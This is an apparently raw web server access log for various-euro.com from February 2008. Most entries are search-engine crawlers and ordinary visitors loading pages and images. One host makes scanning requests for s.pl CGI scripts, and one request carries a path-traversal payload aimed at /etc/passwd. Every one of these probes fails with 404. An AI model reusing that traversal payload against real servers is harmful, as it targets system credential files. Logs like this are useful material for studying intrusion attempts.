208.70.24.232 - - [10/Feb/2008:04:33:27 +0100] "GET /bannerz/d2b_on_o_o.gif HTTP/1.0" 200 6772 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:33:39 +0100] "GET /f-bannnerz.html HTTP/1.0" 200 12651 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:34:04 +0100] "GET /bannerz/sound/blood-Sound002.mid HTTP/1.0" 200 9960 "http://www.various-euro.com/f-bannnerz.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:34:25 +0100] "GET /bannerz/dot_belly.gif HTTP/1.0" 200 5752 "http://www.various-euro.com/f-bannnerz.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:34:52 +0100] "GET /bannerz/dot_celebrities.gif HTTP/1.0" 200 5960 "http://www.various-euro.com/f-bannnerz.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:35:05 +0100] "GET /bannerz/ve-campaign-strip-2.jpg HTTP/1.0" 200 54302 "http://www.various-euro.com/f-bannnerz.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:35:25 +0100] "GET /bannerz/ve-campaign-strip-1.jpg HTTP/1.0" 200 61295 "http://www.various-euro.com/f-bannnerz.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:35:51 +0100] "GET /bannerz/dot_pictures.gif HTTP/1.0" 200 5308 "http://www.various-euro.com/f-bannnerz.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:36:22 +0100] "GET /bannerz/dot_pet.gif HTTP/1.0" 200 5223 "http://www.various-euro.com/f-bannnerz.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:37:01 +0100] "GET /bannerz/aani_2.gif HTTP/1.0" 200 49981 "http://www.various-euro.com/f-bannnerz.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:37:16 +0100] "GET /bannerz/dot_porn.gif HTTP/1.0" 200 7009 "http://www.various-euro.com/f-bannnerz.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:37:27 +0100] "GET /bannerz/gg1.gif HTTP/1.0" 200 30485 "http://www.various-euro.com/f-bannnerz.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:37:47 +0100] "GET /bannerz/ve-girl.gif HTTP/1.0" 200 61791 "http://www.various-euro.com/f-bannnerz.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:38:02 +0100] "GET /bannerz/dot_balls.gif HTTP/1.0" 200 7283 "http://www.various-euro.com/f-bannnerz.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:38:17 +0100] "GET /f-actions.html HTTP/1.0" 200 10429 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:38:33 +0100] "GET /bannerz/invite.gif HTTP/1.0" 200 23929 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:38:47 +0100] "GET /bannerz/iflogo-black-inv.gif HTTP/1.0" 200 661 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:38:59 +0100] "GET /bannerz/horrorkatze/various-sendi.jpg HTTP/1.0" 200 6368 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:39:12 +0100] "GET /bannerz/camubg.gif HTTP/1.0" 200 4375 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:39:26 +0100] "GET /bannerz/iflogo-XII.gif HTTP/1.0" 200 2363 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:39:44 +0100] "GET /bannerz/superfactory-lt.gif HTTP/1.0" 200 1951 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:39:56 +0100] "GET /bannerz/sf-banner-2.gif HTTP/1.0" 200 1836 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:40:11 +0100] "GET /bannerz/list2.gif HTTP/1.0" 200 17776 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
74.6.20.217 - - [10/Feb/2008:04:40:20 +0100] "GET /logs/usage_200710.html HTTP/1.0" 200 110952 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.70.24.232 - - [10/Feb/2008:04:40:30 +0100] "GET /framez-actions.html HTTP/1.0" 200 4322 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:40:46 +0100] "GET /bannerz/canalbleu.gif HTTP/1.0" 200 2319 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:41:06 +0100] "GET /bannerz/iflogow.gif HTTP/1.0" 200 1295 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:41:23 +0100] "GET /bannerz/pseudo.gif HTTP/1.0" 200 202305 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:41:41 +0100] "GET /bannerz/doom-ph.jpg HTTP/1.0" 200 69650 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:41:51 +0100] "GET /bannerz/gradio_berlin.gif HTTP/1.0" 200 4400 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:42:01 +0100] "GET /bannerz/overgarden-toplogo.jpg HTTP/1.0" 200 28153 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:42:14 +0100] "GET /bannerz/vszenarien1.gif HTTP/1.0" 200 8659 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:42:25 +0100] "GET /bannerz/superfactory-volksbuehne.jpg HTTP/1.0" 200 5445 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:42:41 +0100] "GET /bannerz/flyer-front.jpg HTTP/1.0" 200 49246 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:42:53 +0100] "GET /bannerz/joerggruneberg_VARIOUS-EURO.gif HTTP/1.0" 200 231267 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:43:14 +0100] "GET /bannerz/displaced-dilemma.jpg HTTP/1.0" 200 10530 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:43:26 +0100] "GET /bannerz/sound/bruce.mid HTTP/1.0" 200 3515 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:43:36 +0100] "GET /bannerz/interfiction-logo-rot-2006.gif HTTP/1.0" 200 743 "http://www.various-euro.com/f-actions.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
74.6.7.115 - - [10/Feb/2008:05:00:37 +0100] "GET /rez/555.mp3 HTTP/1.0" 200 6017674 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.252.149.15 - - [10/Feb/2008:05:03:24 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.15 - - [10/Feb/2008:05:03:26 +0100] "GET /bmpp/euro_pal_111.html HTTP/1.1" 200 2129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
190.172.185.93 - - [10/Feb/2008:05:27:08 +0100] "GET /cgi-bin/smpro/s.pl?graphic=../../../../../../../../../etc/passwd HTTP/1.1" 404 2748 "http://various-euro.com/cgi-bin/smpro/s.pl?graphic=../../../../../../../../../etc/passwd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
68.142.212.183 - - [10/Feb/2008:05:28:48 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)"
66.231.188.178 - - [10/Feb/2008:06:14:26 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
68.142.212.183 - - [10/Feb/2008:06:21:11 +0100] "GET /DgH/bull/pict/BullGNFL.jpg HTTP/1.0" 200 20466 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)"
74.6.24.109 - - [10/Feb/2008:06:22:57 +0100] "GET /sendi-agent/ HTTP/1.0" 403 1223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.67.80 - - [10/Feb/2008:06:31:38 +0100] "GET / HTTP/1.1" 200 10335 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.52.143.16 - - [10/Feb/2008:07:13:24 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
81.52.143.16 - - [10/Feb/2008:07:13:38 +0100] "GET /bmpp/18_x.html HTTP/1.1" 200 1100 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
64.124.14.34 - - [10/Feb/2008:07:44:22 +0100] "GET / HTTP/1.1" 200 10335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; DigExt)"
66.231.189.112 - - [10/Feb/2008:07:44:37 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
66.231.189.145 - - [10/Feb/2008:07:44:38 +0100] "GET /framez-rez.html HTTP/1.0" 200 4323 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
65.55.209.99 - - [10/Feb/2008:08:06:50 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.99 - - [10/Feb/2008:08:06:51 +0100] "GET /schubb/schubb-2.html HTTP/1.1" 200 16660 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.165.19 - - [10/Feb/2008:08:11:57 +0100] "GET /schubb/schubb-2.html HTTP/1.0" 200 16660 "http://search.live.com/results.aspx?q=schubb&mrt=en-us&FORM=LIVSOP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.165.19 - - [10/Feb/2008:08:11:58 +0100] "GET /framez-schubb2.html HTTP/1.0" 200 4314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.165.19 - - [10/Feb/2008:08:11:58 +0100] "GET /frame-menu.html HTTP/1.0" 200 10763 "http://www.various-euro.com/framez-schubb2.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.165.19 - - [10/Feb/2008:08:11:58 +0100] "GET /schubb/schubb-2.html HTTP/1.0" 200 16660 "http://www.various-euro.com/framez-schubb2.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.165.19 - - [10/Feb/2008:08:11:58 +0100] "GET /frame-unten.html HTTP/1.0" 200 5557 "http://www.various-euro.com/framez-schubb2.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
66.231.188.178 - - [10/Feb/2008:08:57:11 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
72.30.214.237 - - [10/Feb/2008:09:10:24 +0100] "GET / HTTP/1.0" 200 10335 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
190.172.185.93 - - [10/Feb/2008:09:12:58 +0100] "GET /cgi-bin/smpro/s.pl HTTP/1.1" 404 2748 "http://various-euro.com/cgi-bin/smpro/s.pl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
67.195.44.107 - - [10/Feb/2008:09:56:56 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.44.85 - - [10/Feb/2008:09:56:57 +0100] "GET /framez-rez.html HTTP/1.0" 200 4323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.44.85 - - [10/Feb/2008:09:56:58 +0100] "GET /frame-menu.html HTTP/1.0" 200 10763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.44.85 - - [10/Feb/2008:09:56:59 +0100] "GET /f-rez.html HTTP/1.0" 200 9765 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.44.85 - - [10/Feb/2008:09:57:00 +0100] "GET /frame-unten.html HTTP/1.0" 200 5557 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
63.123.238.8 - - [10/Feb/2008:10:35:05 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)"
63.123.238.8 - - [10/Feb/2008:10:35:05 +0100] "GET / HTTP/1.1" 200 10335 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)"
65.55.209.101 - - [10/Feb/2008:11:27:32 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.101 - - [10/Feb/2008:11:27:33 +0100] "GET /schubb/schubb-1.html HTTP/1.1" 200 9070 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.165.122 - - [10/Feb/2008:11:28:49 +0100] "GET /schubb/schubb-1.html HTTP/1.0" 200 9070 "http://search.live.com/results.aspx?q=various&mrt=en-us&FORM=LIVSOP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.165.122 - - [10/Feb/2008:11:28:50 +0100] "GET /framez-schubb.html HTTP/1.0" 200 4324 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.165.122 - - [10/Feb/2008:11:28:50 +0100] "GET /schubb/schubb-1.html HTTP/1.0" 200 9070 "http://www.various-euro.com/framez-schubb.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.165.122 - - [10/Feb/2008:11:28:50 +0100] "GET /frame-menu.html HTTP/1.0" 200 10763 "http://www.various-euro.com/framez-schubb.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.165.122 - - [10/Feb/2008:11:28:51 +0100] "GET /frame-unten.html HTTP/1.0" 200 5557 "http://www.various-euro.com/framez-schubb.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
72.232.212.210 - - [10/Feb/2008:11:29:27 +0100] "GET / HTTP/1.1" 200 10335 "http://o-db.com/en/dictionary/french_english/dame.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)"
190.172.185.93 - - [10/Feb/2008:11:32:00 +0100] "GET /cgi-bin/subpro/s.pl HTTP/1.1" 404 2748 "http://various-euro.com/cgi-bin/subpro/s.pl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
84.70.229.47 - - [10/Feb/2008:11:39:21 +0100] "HEAD /rez/557.mp3 HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.52.143.16 - - [10/Feb/2008:12:19:46 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
81.52.143.16 - - [10/Feb/2008:12:19:52 +0100] "GET /bmpp/18.html HTTP/1.1" 200 4467 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
74.6.19.123 - - [10/Feb/2008:12:42:39 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.29.18 - - [10/Feb/2008:12:42:40 +0100] "GET /f-horrorkatze.html HTTP/1.0" 200 7865 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.24.140 - - [10/Feb/2008:12:44:11 +0100] "GET /logs/ HTTP/1.0" 200 10079 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
190.172.185.93 - - [10/Feb/2008:13:24:17 +0100] "GET /cgi-bin/sm/s.pl HTTP/1.1" 404 2748 "http://various-euro.com/cgi-bin/sm/s.pl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.67.80 - - [10/Feb/2008:13:47:48 +0100] "GET /f-rez.html HTTP/1.1" 200 9765 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
190.172.185.93 - - [10/Feb/2008:14:46:08 +0100] "GET /subpro/s.pl HTTP/1.1" 404 2748 "http://various-euro.com/subpro/s.pl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
193.252.149.15 - - [10/Feb/2008:15:56:11 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.15 - - [10/Feb/2008:15:56:20 +0100] "GET /neon/slow-walk2.html HTTP/1.1" 200 1777 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
190.172.185.93 - - [10/Feb/2008:16:09:18 +0100] "GET /smpro/s.pl HTTP/1.1" 404 2748 "http://various-euro.com/smpro/s.pl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
74.6.27.124 - - [10/Feb/2008:16:55:44 +0100] "GET / HTTP/1.0" 200 10335 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.67.80 - - [10/Feb/2008:17:06:35 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.209.97 - - [10/Feb/2008:17:19:28 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.97 - - [10/Feb/2008:17:19:28 +0100] "GET /framez.html HTTP/1.1" 200 4130 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.97 - - [10/Feb/2008:17:21:28 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.97 - - [10/Feb/2008:17:21:31 +0100] "GET /frame-menu.html HTTP/1.1" 200 10763 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.97 - - [10/Feb/2008:17:21:32 +0100] "GET /frame-inhalt.html HTTP/1.1" 200 6025 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.97 - - [10/Feb/2008:17:21:32 +0100] "GET /frame-unten.html HTTP/1.1" 200 5557 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
190.172.185.93 - - [10/Feb/2008:17:36:26 +0100] "GET /s/s.pl HTTP/1.1" 404 2748 "http://various-euro.com/s/s.pl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
74.6.20.210 - - [10/Feb/2008:18:09:05 +0100] "GET /logs/usage_200702.html HTTP/1.0" 200 107861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
81.18.61.174 - - [10/Feb/2008:18:40:08 +0100] "GET /zampa/montenegro/index.html HTTP/1.1" 200 2651 "http://www.angelfire.com/psy/zampa-di-leone-zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:40:09 +0100] "GET /zampa/ HTTP/1.1" 200 7153 "http://www.angelfire.com/psy/zampa-di-leone-zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:40:09 +0100] "GET /zampa/slike/zampa.gif HTTP/1.1" 200 5310 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:40:10 +0100] "GET /zampa/slike/udupetu.gif HTTP/1.1" 200 4138 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:40:11 +0100] "GET /zampa/slike/inthearse.gif HTTP/1.1" 200 4077 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:40:09 +0100] "GET /zampa/montenegro/slike/plakat.jpg HTTP/1.1" 200 47879 "http://www.various-euro.com/zampa/montenegro/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:40:20 +0100] "GET /zampa/ HTTP/1.1" 200 7153 "http://www.angelfire.com/psy/zampa-di-leone-zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:40:21 +0100] "GET /zampa/slike/inthearse.gif HTTP/1.1" 200 4077 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:40:22 +0100] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:40:28 +0100] "GET /zampa/slike/E5UROSTO.GIF HTTP/1.1" 200 42690 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:41:03 +0100] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:41:04 +0100] "GET /zampa/lybia/index.html HTTP/1.1" 200 3036 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:41:05 +0100] "GET /zampa/lybia/slike/tele.jpg HTTP/1.1" 200 28022 "http://www.various-euro.com/zampa/lybia/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:41:17 +0100] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:41:20 +0100] "GET /zampa/slike/S4IRWIN.GIF HTTP/1.1" 200 54718 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:41:38 +0100] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:41:40 +0100] "GET /zampa/slike/S3VAMPIR.GIF HTTP/1.1" 200 55504 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
81.18.61.174 - - [10/Feb/2008:18:42:03 +0100] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
66.231.188.24 - - [10/Feb/2008:19:10:04 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
190.172.184.19 - - [10/Feb/2008:19:10:12 +0100] "GET /mailme/s.pl HTTP/1.1" 404 2748 "http://various-euro.com/mailme/s.pl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
64.56.66.38 - - [10/Feb/2008:19:16:08 +0100] "GET / HTTP/1.1" 200 10335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
64.56.66.38 - - [10/Feb/2008:19:16:08 +0100] "GET /framez.html HTTP/1.1" 200 4130 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.6.22.226 - - [10/Feb/2008:19:35:30 +0100] "GET /f-euro.html HTTP/1.0" 200 12203 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.12 - - [10/Feb/2008:19:45:43 +0100] "GET /f-sponsor.html HTTP/1.0" 200 8578 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
